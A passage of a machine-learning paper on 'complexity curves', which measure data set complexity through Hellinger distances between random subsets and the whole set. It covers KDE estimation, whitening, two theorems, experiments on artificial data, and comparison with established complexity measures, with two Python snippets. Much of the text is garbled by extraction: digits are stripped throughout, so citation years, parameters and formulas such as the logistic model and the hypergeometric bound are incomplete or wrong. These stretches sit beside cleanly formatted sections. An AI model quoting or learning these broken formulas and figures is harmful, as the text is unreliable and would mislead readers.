stressed by macià et al. ( ), who demonstrated how algorithm comparison may be biased by benchmark data set selection, and showed how the choice may be guided by complexity measures. characterising problem space with some metrics makes it possible to estimate regions in which certain algorithms perform well (luengo & herrera, ), and this opens up possibilities of meta-learning (smith-miles et al., ). in this context, complexity measures are used not only as predictors of classifier performance but, more importantly, as diversity measures capturing various properties of the data sets. it is useful when the measures themselves are diverse and focus on different aspects of the data to give as complete characterisation of the problem space as possible. in the later part of the article we demonstrate that complexity curve fits well into the landscape of currently used measures, offering new insights into data characteristics. a set of practical measures of data complexity with regard to classification was introduced by ho & basu ( ), and later extended by ho, basu & law ( ) and orriols-puig, macià & ho ( ). it is routinely used in tasks involving classifier evaluation (macià et al., ; luengo & herrera, ) and meta-learning (diez-pastor et al., ; mantovani et al., ). 
some of these measures are based on the overlap of values of specific attributes; examples include fisher’s discriminant ratio, volume of overlap region, attribute efficiency etc. the others focus directly on class separability; this group includes measures such as the fraction of points on the decision boundary, linear separability, the ratio of intra/inter class distance. in contrast to our method, such measures focus on specific properties of the classification problem, measuring shape of the decision boundary and the amount class overlap. topological measures concerned with data sparsity, such as ratio of attributes to observations, attempt to capture similar properties as our complexity curve. li & abu-mostafa ( ) defined data set complexity in the context of classification using the general concept of kolmogorov complexity. they proposed a way to measure data set complexity using the number of support vectors in support vector machine (svm) classifier. they analysed the problems of data decomposition and data pruning using above methodology. a graphical representation of the data set complexity called the complexity-error plot was also introduced. the main problem with their approach is the selection of very specific and complex machine learning algorithms, which may render the results in less universal way, and which are prone to biases specific to svms. this make their method unsuitable for diverse machine learning algorithms comparison. another approach to data complexity is to analyse it on the level of individual instances. this kind of analysis is performed by smith, martinez & giraud-carrier ( ), who zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. attempted to identify which instances are misclassified by various classification algorithm. they devised local complexity measures calculated with respect to single instances and later tried to correlate average instance hardness with global data complexity measures of ho & basu ( ). they discovered that it is mostly correlated with class overlap. this makes our work complementary, since in our complexity measure we deliberately ignore class overlap and individual instance composition to isolate another source of difficulty, namely data scarcity. yin et al. ( ) proposed a method of feature selection based on hellinger distance (a measure of similarity between probability distributions). the idea was to choose features, which conditional distributions (depending on the class) have minimal affinity. in the context of our framework, this could be interpreted as measuring data complexity for single features. the authors demonstrated experimentally that, for the high-dimensional imbalanced data sets, their method is superior to popular feature selection methods using fisher criterion, or mutual information. definitions in the following sections, we define formally all measures used throughout the paper. basic intuitions, assumptions, and implementation choices are discussed. finally, algorithms for calculating complexity curve, conditional complexity curve, and generalisation curve are given. measuring data complexity with samples in a typical machine learning scenario, we want to use information contained in a collected data sample to solve a more general problem which our data describe. problem complexity can be naturally measured by the size of a sample needed to describe the problem accurately. 
We call the problem complex if we need to collect a lot of data in order to get any results. On the other hand, if a small amount of data suffices, we say the problem has low complexity.

How can we determine whether a data sample describes the problem accurately? Any problem can be described with a multivariate probability distribution P of a random vector X. From P we sample our finite data sample D. We can then use D to build the estimated probability distribution of X, denoted P_D. P_D is an approximation of P. If P and P_D are identical, we know that the data sample D describes the problem perfectly and collecting more observations would not give us any new information. Analogously, if P_D is very different from P, we can be almost certain that the sample is too small.

To measure similarity between probability distributions we use the Hellinger distance. For two continuous distributions P and P_D with probability density functions p and p_D it is defined as:

H^2(P, P_D) = \frac{1}{2} \int \left( \sqrt{p(x)} - \sqrt{p_D(x)} \right)^2 dx.

The minimum possible distance is achieved when the distributions are identical; the maximum is achieved when any event with non-zero probability in P has zero probability in P_D and vice versa. Its simplicity and naturally defined 0-1 range make the Hellinger distance a good measure for capturing sample information content.

In most cases we do not know the underlying probability distribution P representing the problem and all we have is a data sample D, but we can still use the described complexity measure. Let us picture our data D as the true source of knowledge about the problem and the estimated probability distribution P_D as the reference distribution. Any subset S ⊂ D can be treated as a data sample, and a probability distribution P_S estimated from it will be an approximation of P_D. By calculating H(P_D, P_S) we can assess how well a given subset represents the whole available data, i.e., determine its information content.

Obtaining a meaningful estimation of a probability distribution from a data sample poses difficulties in practice. The probability distribution we are interested in is the joint probability over all attributes. In that context, most realistic data sets should be regarded as extremely sparse, and naïve probability estimation using frequencies of occurring values would result in a mostly flat distribution. This can be called the curse of dimensionality. Against this problem, we apply a naïve assumption that all attributes are independent. This may seem like a radical simplification but, as we will demonstrate later, it yields good results in practice and constitutes a reasonable baseline for common machine learning techniques. Under the independence assumption we can calculate the joint probability density function f from the marginal density functions f_1, ..., f_n:

f(x) = f_1(x_1) f_2(x_2) \cdots f_n(x_n).

We will now show the derived formula for the Hellinger distance under the independence assumption. Observe that the Hellinger distance for continuous variables can be expressed in another form:

\frac{1}{2}\int \left(\sqrt{f(x)} - \sqrt{g(x)}\right)^2 dx = \frac{1}{2}\int \left( f(x) - 2\sqrt{f(x) g(x)} + g(x) \right) dx = \frac{1}{2}\int f(x)\,dx - \int \sqrt{f(x) g(x)}\,dx + \frac{1}{2}\int g(x)\,dx = 1 - \int \sqrt{f(x) g(x)}\,dx.

In the last step we used the fact that the integral of a probability density over its domain must equal one. We will consider two multivariate distributions f and g with density functions:

f(x_1, \ldots, x_n) = f_1(x_1) \cdots f_n(x_n)
g(x_1, \ldots, x_n) = g_1(x_1) \cdots g_n(x_n).
The last formula for the Hellinger distance will now expand:

1 - \int \cdots \int \sqrt{f(x_1, \ldots, x_n)\, g(x_1, \ldots, x_n)}\; dx_1 \ldots dx_n
= 1 - \int \cdots \int \sqrt{f_1(x_1) \cdots f_n(x_n)\, g_1(x_1) \cdots g_n(x_n)}\; dx_1 \ldots dx_n
= 1 - \int \sqrt{f_1(x_1) g_1(x_1)}\, dx_1 \cdots \int \sqrt{f_n(x_n) g_n(x_n)}\, dx_n.

In this form, the variables are separated and parts of the formula can be calculated separately.

Practical considerations

Calculating the introduced measure of similarity between data sets in practice poses some difficulties. First, in the derived formula a direct multiplication of probabilities occurs, which leads to problems with numerical stability. We increased the stability by switching to the following formula:

1 - \int \sqrt{f_1(x_1) g_1(x_1)}\, dx_1 \cdots \int \sqrt{f_n(x_n) g_n(x_n)}\, dx_n
= 1 - \left( 1 - \tfrac{1}{2}\int \left(\sqrt{f_1(x_1)} - \sqrt{g_1(x_1)}\right)^2 dx_1 \right) \cdots \left( 1 - \tfrac{1}{2}\int \left(\sqrt{f_n(x_n)} - \sqrt{g_n(x_n)}\right)^2 dx_n \right)
= 1 - \left( 1 - H^2(f_1, g_1) \right) \cdots \left( 1 - H^2(f_n, g_n) \right).

For continuous variables, estimation of the probability density function is routinely done with kernel density estimation (KDE)—a classic technique for estimating the shape of a continuous probability density function from a finite data sample (Scott, ). For a sample (x_1, x_2, \ldots, x_n) the estimated density function has the form:

\hat{f}_h(x) = \frac{1}{nh} \sum_{i=1}^{n} K\!\left( \frac{x - x_i}{h} \right)

where K is the kernel function and h is a smoothing parameter, the bandwidth. In our experiments we used the Gaussian function as the kernel. This is a popular choice, which often yields good results in practice. The bandwidth was set according to the modified Scott's rule (Scott, ): h = n^{-1/(d+4)}, where n is the number of samples and d the number of dimensions.

In many cases, the independence assumption can be supported by preprocessing the input data in a certain way. A very common technique which can be applied in this situation is the whitening transform. It transforms any set of random variables into a set of uncorrelated random variables. For a random vector X with a covariance matrix \Sigma, a new uncorrelated vector Y can be calculated as follows:

\Sigma = P D P^{-1}
W = P D^{-1/2} P^{-1}
Y = X W

where D is the diagonal matrix containing the eigenvalues and P is the matrix of right eigenvectors of \Sigma. Naturally, lack of correlation does not imply independence, but it nevertheless reduces the error introduced by our independence assumption. Furthermore, it blurs the difference between categorical variables and continuous variables, putting them on an equal footing. In all further experiments, we use whitening transform preprocessing and then treat all variables as continuous.
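Because the measure is built only from one-dimensional density estimates, it can be sketched in a few lines of Python. The snippet below is a minimal illustration assuming NumPy and SciPy; the helper names (whiten, hellinger2_1d, hellinger2_independent) are ours and are not taken from the authors' released package at https://github.com/zubekj/complexity_curve, which remains the reference implementation. SciPy's gaussian_kde applies Scott's rule bandwidth by default, matching the one-dimensional form of the rule quoted above.

```python
import numpy as np
from scipy.stats import gaussian_kde

def whiten(X):
    """Decorrelate attributes: Y = X W with W = P D^(-1/2) P^(-1),
    where Sigma = P D P^(-1) is the eigendecomposition of the covariance matrix."""
    Xc = X - X.mean(axis=0)
    d, P = np.linalg.eigh(np.cov(Xc, rowvar=False))   # eigenvalues, eigenvectors
    W = P @ np.diag(1.0 / np.sqrt(np.maximum(d, 1e-12))) @ P.T
    return Xc @ W

def hellinger2_1d(a, b, grid_size=512):
    """Squared Hellinger distance between two 1-D samples, estimated with
    Gaussian KDE (Scott's rule bandwidth) on a shared grid."""
    lo, hi = min(a.min(), b.min()), max(a.max(), b.max())
    pad = 0.5 * (hi - lo) + 1e-9
    grid = np.linspace(lo - pad, hi + pad, grid_size)
    affinity = np.trapz(np.sqrt(gaussian_kde(a)(grid) * gaussian_kde(b)(grid)), grid)
    return 1.0 - min(affinity, 1.0)                    # H^2 = 1 - integral of sqrt(f*g)

def hellinger2_independent(A, B):
    """H^2 between two multivariate samples under the attribute-independence
    assumption, using the numerically stable product form
    H^2 = 1 - prod_i (1 - H^2(f_i, g_i))."""
    prod = 1.0
    for j in range(A.shape[1]):
        prod *= 1.0 - hellinger2_1d(A[:, j], B[:, j])
    return 1.0 - prod
```

With these helpers, the distance between a random subset indexed by idx and the whole whitened data set X is simply hellinger2_independent(X[idx], X).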
the relation between the defined data complexity and the difficulty of a specific machine learning task has to be investigated. we will focus on the supervised learning case. classification error will be measured as mean – error (accuracy). data complexity will be measured as mean hellinger distance between the real and the estimated probability distributions of attributes conditioned on the target variable: m m∑ i= h (p(x|y =yi),pd(x|y =yi)) where x—vector of attributes, y —target variable, y ,y ,...ym—values taken by y . it has been shown that error of an arbitrary classification or regression model can be decomposed into three parts: error=bias+variance+noise. domingos ( ) proposed an universal scheme of decomposition, which can be adapted for different loss functions. for a classification problem and – loss l expected error on sample x for which the true label is t, and the predicted label given a training set d is y can be expressed as: ed,t[ (t =y)] = (et[t] =ed[y]) + c ed[ (y =ed[y])] + c et[ (t =et[t])] =b(x) + c v (x) + c n(x) where b—bias, v —variance, n—noise. coefficients c and c are added to make the decomposition consistent for different loss functions. in this case, they are equal to: c =pd(y =et[t])−pd(y =et[t])pt (y = t |et[t] = t) c = { if et[t]=ed[y] −pd(y =et[t] |y =ed[y]) otherwise. bias comes from an inability of the applied model to represent the true relation present in data, variance comes from an inability to estimate the optimal model parameters from the zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data sample, the noise is inherent to the solved task and irreducible. since our complexity measure is model agnostic, it clearly does not include bias component. as it does not take into account the dependent variable, it cannot measure noise either. all that is left to investigate is the relation between our complexity measure and variance component of the classification error. the variance error component is connected with overfitting, when the model fixates over specific properties of a data sample and looses generalisation capabilities over the whole problem domain. if the training sample represented the problem perfectly and the model was fitted with perfect optimisation procedure, variance would be reduced to zero. the less representative the training sample is for the whole problem domain, the larger the chance for variance error. this intuition can be supported by comparing our complexity measure with the error of the bayes classifier. we will show that they are closely related. let y be the target variable taking on values v ,v ,...,vm, fi(x) an estimation of p(x =x|y =vi) from a finite sample d, and g(y) an estimation of p(y =y). in such a setting, – loss of the bayes classifier on a sample x with the true label t is: (t =y)= ( t =argmaxi ( g(vi)fi(x) )) . let assume that t =vj. observe that: vj =argmax i ( g(vi)fi(x) ) ⇔∀ig(vj)fj(x)−g(vi)fi(x)≥ which for the case of equally frequent classes reduces to: ∀ifj(x)−fi(x)≥ . we can simultaneously add and subtract term p(x =x |y =vj)−p(x =x |y =vi) to obtain: ∀i ( fj(x)−p(x =x |y =vj) ) + ( p(x =x |y =vi)−fi(x) ) + ( p(x =x |y =vj)−p(x =x |y =vi) ) ≥ . we know that p(x =x|y =vj)−p(x =x|y =vi)≥ , so as long as estimations fi(x), fj(x) do not deviate too much from real distributions the inequality is satisfied. 
it will not be satisfied (i.e., an error will take place) only if the estimations deviate from the real distributions in a certain way (i.e., fj(x)<p(x =x|y =vj) and fi(x)>p(x =x|y =vi)) and the sum of these deviations is greater than p(x =x|y =vj)−p(x =x|y =vi). the hellinger distance between fi(x) and p(x =x|y =vi) measures the deviation. this shows that by minimising hellinger distance we are also minimising error of the bayes classifier. the converse may not be true: not all deviations of probability estimates result in classification error. in the introduced complexity measure, we assumed independency of all attributes, which is analogous to the assumption of naïve bayes. small hellinger distance between zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. class-conditioned attribute distributions induced by sets a and b means that naïve bayes trained on set a and tested on set b will have only very slight variance error component. of course, if the independence assumption is broken bias error component may still be substantial. complexity curve complexity curve is a graphical representation of a data set complexity. it is a plot presenting the expected hellinger distance between a subset and the whole set versus subset size: cc(n)=e[h (p,qn)] where p is the empirical probability distribution estimated from the whole set and qn is the probability distribution estimated from a random subset of size n≤|d|. let us observe that cc(|d|)= because p =q|d|. q is undefined, but for the sake of convenience we assume cc( )= . algorithm procedure for calculating complexity curve. d – original data set, k – number of random subsets of the specified size. . transform d with whitening transform and/or ica to obtain di . . estimate probability distribution for each attribute of di and calculate joint probabil- ity distribution – p. . for i in ...|di| (with an optional step size d): (a) for j in ...k : i. draw subset sji ⊆di such that |s j i|= i. ii. estimate probability distribution for each attribute of sji and calculate joint probability distribution – qji. iii. calculate hellinger distance: lji =h (p,qji). (b) calculate mean mi and standard error si: mi= k k∑ j= lji si= √√√√ k k∑ j= ( mi−l j i ) complexity curve is a plot of mi±si vs i. to estimate complexity curve in practice, for each subset size k random subsets are drawn and the mean value of hellinger distance, along with standard error, is marked on the plot. the algorithm presents the exact procedure. parameters k (the number of samples of a specified size) and d (sampling step size) control the trade-off between the precision of the calculated curve and the computation time. in all experiments, unless stated otherwise, we used values k = , d = |d| . regular shapes of the obtained curves did not suggest the need for using larger values. figure presents a sample complexity curve (solid lines). it demonstrates how by drawing larger subsets of the data we get better approximations of the original distribution, as indicated by the decreasing hellinger distance. the logarithmic decrease of the distance zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curve (solid) and conditional complexity curve (dashed) for iris data set. 
is characteristic: it means that with a relatively small number of samples we can recover the general characteristics of the distribution, but to model the details precisely we need a lot more data points.

Figure: Complexity curve (solid) and conditional complexity curve (dashed) for the iris data set.

The shape of the curve is very regular, with just minimal variations. This means that the subset size has a far greater impact on the Hellinger distance than the composition of the individual subsets.

The shape of the complexity curve captures information on the complexity of the data set. If the data is simple, it is possible to represent it relatively well with just a few instances. In such a case, the complexity curve is very steep at the beginning and flattens towards the end of the plot. If the data is complex, the initial steepness of the curve is smaller. That information can be aggregated into a single parameter—the area under the complexity curve (AUCC). If we express the subset size as the fraction of the whole data set, then the value of the area under the curve becomes limited to the range [0, 1] and can be used as a universal measure for comparing the complexity of different data sets.

Conditional complexity curve

The complexity curve methodology presented so far deals with the complexity of a data set as a whole. While this approach gives information about data structure, it may assess the complexity of the classification task incorrectly. This is because the data distribution inside each of the classes may vary greatly from the overall distribution. For example, when the number of classes is larger, or the classes are imbalanced, a random sample large enough to represent the whole data set may be too small to represent some of the classes. To take this into account, we introduce the conditional complexity curve. We calculate it by splitting each data sample according to the class value and taking the arithmetic mean of the complexities of each sub-sample. The algorithm below presents the exact procedure.

Algorithm: procedure for calculating the conditional complexity curve. D – original data set, c – number of classes, N – number of subsets, k – number of samples.

1. Transform D with the whitening transform and/or ICA to obtain D_I.
2. Split D_I according to the class into D_I^1, D_I^2, ..., D_I^c.
3. From D_I^1, D_I^2, ..., D_I^c estimate probability distributions P^1, P^2, ..., P^c.
4. For i in 1 ... |D_I| with a step size |D_I|/N:
   (a) For j in 1 ... k:
       i. Draw a subset S_i^j ⊆ D_I such that |S_i^j| = i.
       ii. Split S_i^j according to the class into S_i^{j,1}, S_i^{j,2}, ..., S_i^{j,c}.
       iii. From S_i^{j,1}, S_i^{j,2}, ..., S_i^{j,c} estimate probability distributions Q_i^{j,1}, Q_i^{j,2}, ..., Q_i^{j,c}.
       iv. Calculate the mean Hellinger distance: l_i^j = \frac{1}{c} \sum_{m=1}^{c} H(P^m, Q_i^{j,m}).
   (b) Calculate the mean m_i and standard error s_i:
       m_i = \frac{1}{k} \sum_{j=1}^{k} l_i^j,   s_i = \sqrt{ \frac{1}{k} \sum_{j=1}^{k} \left( m_i - l_i^j \right)^2 }

The conditional complexity curve is a plot of m_i ± s_i vs i.

A comparison of the standard complexity curve and the conditional complexity curve for the iris data set is given in the figure above. This data set has three distinct classes. Our expectation is that estimating the conditional distributions for each class would require larger data samples than estimating the overall distribution. The shape of the conditional complexity curve is consistent with this expectation: it is less steep than the standard curve and has a larger AUCC value.

Properties

To support the validity of the proposed method, we perform an in-depth analysis of its properties.
we start from purely mathematical analysis, giving some intuitions on the complexity curve convergence rate and identifying border cases. then, we perform experiments with toy artificial data sets testing basic assumptions behind complexity curve. after that, we compare it experimentally with other complexity data measures and show its usefulness in explaining classifier performance. mathematical properties drawing a random subset sn from a finite data set d of size n corresponds to sampling without replacement. let assume that the data set contains k distinct values {v ,v ,...,vk} occurring with frequencies p =(p ,p ,...,pk). qn=(q ,q ,...,qk) will be a random vector which follows a multivariate hypergeometric distribution. qi= n ∑ y∈sn {y =vi}. the expected value for any single element is: e[qi]=pi. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the probability of obtaining any specific vector of frequencies: p ( qn=(q ,q ,...,qk) ) = ( p n q n )( p n q n ) ··· ( pkn qkn ) ( n n ) with ∑k i= qi= . we will consider the simplest case of discrete probability distribution estimated through frequency counts without using the independence assumption. in such case complexity curve is by definition: cc(n)=e[h (p,qn)]. it is obvious that cc(n)= because when n=n we draw all available data. this means that complexity curve always converges. we can ask whether it is possible to say anything about the rate of this convergence. this is the question about the upper bound on the tail of hypergeometric distribution. such bound is given by hoeffding-chvátal inequality (chvátal, ; skala, ). for the univariate case it has the following form: p (∣∣qi−pi∣∣≥δ)≤ e− δ n which generalises to a multivariate case as: p(|qn−p|≥δ)≤ ke − δ n where |qn−p| is the total variation distance. since h (p,qn)≤|qn−p| this guarantees that complexity curve converges at least as fast. now we will consider a special case when n= . in this situation the multivariate hypergeometric distribution is reduced to a simple categorical distribution p. in such case the expected hellinger distance is: e[h (p,q )]= k∑ i= pi √ √√√√ k∑ j= (√ pj− {j=k} ) = k∑ i= pi √ √ −pi+ (√ pi− ) = k∑ i= pi √ − √ pi. this corresponds to the first point of complexity curve and determines its overall steepness. theorem: e[h (p,q )] is maximal for a given k when p is an uniform categorical distribution over k categories, i.e.,: e[h (p,q )]= k∑ i= pi √ − √ pi≤ √ − √ k . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proof: we will consider an arbitrary distribution p and the expected hellinger distance e[h (p,q )]. we can modify this distribution by choosing two states l and k occurring with probabilities pl and pk such as that pl −pk is maximal among all pairs of states. we will redistribute the probability mass between the two states creating a new distribution p′. the expected hellinger distance for the distribution p′ will be: e[h (p′,q )]= k∑ i= ,i =k,i =l pi √ − √ pi+a √ − √ a+(pk+pl−a) √ − √ pk+pl−a where a and pk +pl −a are new probabilities of the two states in p′. we will consider a function f (a)=a √ − √ a+(pk+pl−a) √ − √ pk+pl and look for its maxima. ∂f (x) ∂a =− √ − √ pk+pl−a+ √ pk+pl−a √ − √ pk+pl−a + √ − √ a− √ a √ − √ a . the derivative is equal to if and only if a= pk+pl . we can easily see that: f ( )= f (pk+pl)=(pk+pl) √ − √ pk+pl <(pk+pl) √ − √ pk+pl . 
this means that f (a) reaches its maximum for a= pk+pl . from that, we can conclude that for any distribution p if we produce distribution p′ by redistributing probability mass between two states equally the following holds: e[h (p′,q )]≥e[h (p,q )]. if we repeat such redistribution arbitrary number of times the outcome distribution converges to uniform distribution. this proves that the uniform distribution leads to the maximal expected hellinger distance for a given number of states. theorem: increasing the number of categories by dividing an existing category into two new categories always increases the expected hellinger distance, i.e., k∑ i= pi √ − √ pi≤ k∑ i= ,i =l pi √ − √ pi+a √ − √ a+(pl−a) √ − √ pl−a. proof: without the loss of generality, we can assume that a< . pl. we can subtract terms occurring on both sides of the inequality obtaining: pl √ − √ pl ≤a √ − √ a+(pl−a) √ − √ pl−a pl √ − √ pl ≤a √ − √ a+pl √ − √ pl−a−a √ − √ pl−a pl √ − √ pl+a √ − √ pl−a≤a √ − √ a+pl √ − √ pl−a. now we can see that: pl √ − √ pl ≤pl √ − √ pl−a zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and a √ − √ pl−a≤a √ − √ a which concludes the proof. from the properties stated by these two theorems, we can gain some intuitions about complexity curves in general. first, by looking at the formula for the uniform distribution e[h (p,q )]= √ − √ k we can see that when k = e[h (p,q )]= and when k →∞ e[h (p,q )]→ . the complexity curve will be less steep if the variables in the data set take multiple values and each value occurs with equal probability. this is consistent with our intuition: we need a larger sample to cover such space and collect information. for a smaller number of distinct values or distributions with mass concentrated mostly in a few points, a smaller sample will be sufficient to represent most of the information in the data set. complexity curve and the performance of an unbiased model to confirm validity of the assumptions behind the complexity curve, we performed experiments with artificial data generated according to known models. for each of the data set, we selected an appropriate classifier which is known to be unbiased with respect to the given model. in this way it was possible to observe if the variance error component is indeed upper bounded by the complexity curve. to train the classifiers, we used the same setting as when calculating the complexity curve: classifiers were trained on random subsets and tested on the whole data set. we fitted the learning curve to the complexity curve by matching first and last points of both curves. we then observed the relation of the two curves in between. the first generated data set followed the logistic model (logit data set). matrix x ( , observations, attributes) contained values drawn from the normal distribution with mean and standard deviation . class vector y was defined as follows: p(y |x)= eβ ′x( +eβ′x ) where β= ( . , . , . , . , . , . , , , , , , ). all attributes were independent and conditionally independent. since y values were determined in a non-deterministic way, there was some noise present –classification error of the logistic regression classifier trained and tested on the full data set was larger than zero. figure presents the complexity curve and the adjusted error of logistic regression for the generated data. after ignoring the noise error component, we can see that the variance error component is indeed upper bounded by the complexity curve. 
different kind of artificial data represented multidimensional space with parallel stripes in one dimension (stripes data set). it consisted of x matrix with , observations and attributes drawn from an uniform distribution defined on the range [ , ). class values y depended only on the values of one of the attributes: for values lesser than . or greater than . the class was , for other values the class was . this kind of relation can zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curve and learning curve of the logistic regression on the logit data. figure complexity curve and learning curve of the decision tree on the stripes data. be naturally modelled with a decision tree. all the attributes are again independent and conditionally independent. figure presents complexity curve and the adjusted error of decision tree classifier on the generated data. once again the assumptions of complexity curve methodology are satisfied and the complexity curve indeed an upper bounds the classification error. what would happen if the attribute conditional independence assumption was broken? to answer this question, we generated another type of data modelled after multidimensional zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curve and learning curve of the decision tree on the chessboard data. chessboard (chessboard data set). x matrix contained , observations and , attributes drawn from an uniform distribution on range[ , ). class vector y had the following values:{ if mi= ⌊xi s ⌋ is even otherwise where s was a grid step in our experiments set to . . there is clearly strong attribute dependence, but since all parts of decision boundary are parallel to one of the attributes this kind of data can be modelled with a decision tree with no bias. figure presents complexity curves and error curves for different dimensionalities of chessboard data. here the classification error becomes larger than indicated by complexity curve. the more dimensions, the more dependencies between attributes violating com- plexity curve assumptions. for a three-dimensional chessboard the classification problem becomes rather hard and the observed error decreases slowly, but the complexity curve remains almost the same as for a two-dimensional case. this shows that the complexity curve is not expected to be a good predictor of classification accuracy in the problems where a lot of high-dimensional attribute dependencies occur for example, in epistatic domains in which the importance of one attribute depends on the values of the other. the results of experiments with controlled artificial data sets are consistent with our theoretical expectations. based on these results, we can introduce a general interpretation of the difference between complexity curve and learning curve: learning curve below the complexity curve is an indication that the algorithm is able to build a good model without sampling the whole domain, limiting the variance error component. on the other hand, the learning curve above the complexity curve is an indication that the algorithm includes complex attributes dependencies in the constructed model, promoting the variance error component. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
figure complexity curves for whitened data (dashed lines) and not whitened data (solid lines). ar- eas under the curves are given in the legend. i—set of independent random variables with student’s t distribution. r—one random variable with student’s t distribution repeated times. i_w—whitened i. r_w—whitened r. impact of whitening and ica to evaluate the impact of the proposed preprocessing techniques (whitening and ica— independent component analysis) on complexity curves, we performed experiments with artificial data. in the first experiment, we generated two data sets of observations and with eight attributes distributed according to student’s t distribution with . degrees of freedom. in one data set all attributes were independent, in the other the same attribute was repeated eight times. small gaussian noise was added to both sets. figure shows complexity curves calculated before and after whitening transform. we can see that whitening had no significant effect on the complexity curve of the independent set. in the case of the dependent set, complexity curve calculated after whitening decreases visibly faster and the area under the curve is smaller. this is consistent with our intuitive notion of complexity: a data set with highly correlated or duplicated attributes should be significantly less complex. in the second experiment, two data sets with observations and four attributes were generated. the first data set was generated from the continuous uniform distribution on interval [ , ], the second one from the discrete (categorical) uniform distribution on the same interval. small gaussian noise was added to both sets. figure presents complexity curves for original, whitened and ica-transformed data. among the original data sets, the intuitive notion of complexity is preserved: the area under the complexity curve for categorical data is smaller. the difference disappears for the whitened data but is again visible in the ica-transformed data. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curves for whitened data (dashed lines), not whitened data (solid lines) and ica- transformed data (dotted lines). areas under the curves are given in the legend. u—data sampled from uniform distribution. c—data sampled from categorical distribution. u_w—whitened u. c_w—whitened c. u_ica—u_w after ica. c_ica—c_w after ica. these simple experiments are by no means exhaustive but they confirm usefulness of the chosen signal processing techniques (data whitening and the independent component analysis) in the complexity curve analysis. complexity curve variability and outliers the complexity curve is based on the expected hellinger distance and the estimation procedure includes some variance. the natural assumption is that the variability caused by the sample size is greater than the variability resulting from a specific composition of a sample. otherwise, averaging over samples of the same size would not be meaningful. this assumption is already present in standard learning curve methodology where classifier accuracy is plotted against training set size. we expect that the exact variability of the complexity curve will be connected with the presence of outliers in the data set. such influential observations will have a huge impact depending on whether they will be included in a sample or not. 
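The whitening experiment just described can be approximated with a short script. The sketch below, under the same assumptions and helper conventions as the earlier snippets (our own function names, SciPy/NumPy, per-attribute Gaussian KDE), generates one set of independent Student's t attributes and one set in which a single t-distributed attribute is repeated, adds small Gaussian noise, and compares the mean Hellinger distance of small random subsets before and after whitening. The sample size, degrees of freedom, and noise scale are illustrative and not the paper's exact settings.

```python
import numpy as np
from scipy.stats import gaussian_kde, t as student_t

def hellinger2_independent(A, B, grid_size=256):
    prod = 1.0
    for j in range(A.shape[1]):
        a, b = A[:, j], B[:, j]
        grid = np.linspace(min(a.min(), b.min()) - 1.0, max(a.max(), b.max()) + 1.0, grid_size)
        prod *= min(np.trapz(np.sqrt(gaussian_kde(a)(grid) * gaussian_kde(b)(grid)), grid), 1.0)
    return 1.0 - prod

def whiten(X):
    Xc = X - X.mean(axis=0)
    d, P = np.linalg.eigh(np.cov(Xc, rowvar=False))
    return Xc @ P @ np.diag(1.0 / np.sqrt(np.maximum(d, 1e-12))) @ P.T

def mean_hellinger(X, subset_size, reps=20, seed=0):
    """Expected Hellinger distance between a random subset and the whole set."""
    rng = np.random.default_rng(seed)
    return np.mean([np.sqrt(hellinger2_independent(
        X[rng.choice(len(X), subset_size, replace=False)], X)) for _ in range(reps)])

n, noise = 1000, 0.01
rng = np.random.default_rng(1)
independent = student_t.rvs(df=2.5, size=(n, 8), random_state=1)
repeated = np.tile(student_t.rvs(df=2.5, size=(n, 1), random_state=2), (1, 8))
for name, X in [("independent", independent), ("repeated", repeated)]:
    X = X + rng.normal(scale=noise, size=X.shape)
    print(name,
          "raw:", round(mean_hellinger(X, 50), 3),
          "whitened:", round(mean_hellinger(whiten(X), 50), 3))
```

Under the independence assumption the raw "repeated" set looks roughly as complex as the truly independent one, while after whitening its redundant directions collapse and the measured distance shrinks, which is the qualitative effect reported above.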
to verify whether these intuitions were true, we constructed two new data sets by introducing artificially outliers to wine data set. in wine we modified % of the attribute values by multiplying them by a random number from range (− , ). in wine % of the values were modified in such manner. figure presents conditional complexity curves for all three data sets. wine curve has indeed a higher variance and is less regular than wine curve. wine curve is characterised not only by a higher variance but also by a larger aucc value. this means that adding so much noise increased the overall complexity of the data set significantly. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curves for wine and its counterparts with introduced outliers. for the sake of clarity only contours were drawn. the result support our hypothesis that large variability of complexity curve signify an occurrence of highly influential observations in the data set. this makes complexity curve a valuable diagnostic tool for such situations. however, it should be noted that our method is unable to distinguish between important outliers and plain noise. to obtain this kind of insight, one has to employ different methods. comparison with other complexity measures the set of data complexity measures developed by ho & basu ( ) and extended by ho, basu & law ( ) continues to be used in experimental studies to explain performance of various classifiers (diez-pastor et al., ; mantovani et al., ). we decided to compare experimentally complexity curve with those measures. descriptions of the measures used are given in table . according to our hypothesis conditional complexity curve should be robust in the context of class imbalance. to demonstrate this property, we used for the comparison imbalanced data sets used previously in the study by diez-pastor et al. ( ). these data sets come originally from hddt (cieslak et al., ) and keel (alcalá et al., ) repositories. we selected only binary classification problems. the list of data sets with their properties is presented in supplemental information as table s and table s . for each data set, we calculated the area under the complexity curve using the previously described procedure and the values of other data complexity measures using dcol software (orriols-puig, macià & ho, ). pearson’s correlation was then calculated for all the measures. as the t measure seemed to have non-linear characteristics destroying the correlation additional column logt was added to comparison. results are presented in fig. . clearly, aucc is mostly correlated with logt measure. this is to be expected as both measures are concerned with sample size in relation to attribute 